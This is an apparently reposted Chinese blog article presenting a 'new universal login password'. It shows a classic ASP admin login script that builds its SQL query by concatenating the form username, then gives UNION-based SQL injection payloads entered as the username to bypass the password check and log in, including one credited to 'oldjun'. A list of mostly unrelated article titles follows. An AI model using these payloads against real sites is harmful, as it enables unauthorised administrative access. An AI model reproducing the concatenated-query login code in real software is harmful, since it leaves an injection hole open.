新型万能登录密码
来源:互联网 发布:淘宝图片被保护怎么办 编辑:程序博客网 时间:2024/04/28 03:16
新型万能登录密码
文章截取如下:
网上有很多这样的登陆验证代码
<%
username=trim(Request.Form("username"))
password=trim(Request.Form("password"))
sql="Select * FROM admin Where user='"&username&"'"
Set rs=Server.CreateObject("adodb.recordset")
rs.Open sql,conn,1,1
if rs.eof then
checksysUser=FALSE
else
passwd=trim(rs("pwd"))
if passwd=password then
Session("admin")=username
checksysUser=TRUE
else
checksysUser=FALSE
end if
End if
rs.close
conn.close
if checksysUser=true then
Response.Redirect("main.asp")
else
errmsg="<font color=#FF0000><b>用户名输入有误,请重新输入!</b></font>"
end if
%>
先在数据库中查询用户名对应的密码,然后再和用户输入的密码对比,导致'or'='or'这样的万能登陆密码失
效.但如果在上面的程序中,用户名输入' UNION Select 1,1,1 FROM admin Where ''=',密码输入1,就可以登陆成功,原理很简单,就不多说了.顺便附上oldjun的语句:' UNION Select 1,1,1 AS pwd FROM admin Where ''='
- 新型万能登录密码
- 新型万能登陆密码
- 万能密码
- php万能密码
- PHP万能密码
- 各种万能密码
- 网站万能密码
- PARADOX DB 万能密码
- 网站万能密码是什么
- phpmyadmin万能密码
- 万能密码的问题
- 网站万能密码收集
- 后台登陆万能密码
- 万能密码使用原理
- 万能密码大全
- Juniper Networks(瞻博网络)现后门:万能密码登录设备、可解密VPN流量
- 23-mysql万能用户名和万能密码
- 网站万能密码收集与php万能密码详解
- EJB应用从WebLogic到JBoss的迁移方法
- pku 2485 Highways(prim)
- vsftp配置手册
- Linuxupstart和ubuntu启动过程原理介绍
- LINUX 常见问题1000个详细解答
- 新型万能登录密码
- 通钢血案反思:弱者利益诉求渠道缺乏
- 密钥对连接ssh,不需密码
- struts的htmlcheckbox标签的默认选中问题.
- What’s new in Windows 7
- 看殷人昆《数据结构》
- 大型网站的头尾部分处理
- 积分
- .NET中使用Memcached的相关资源整理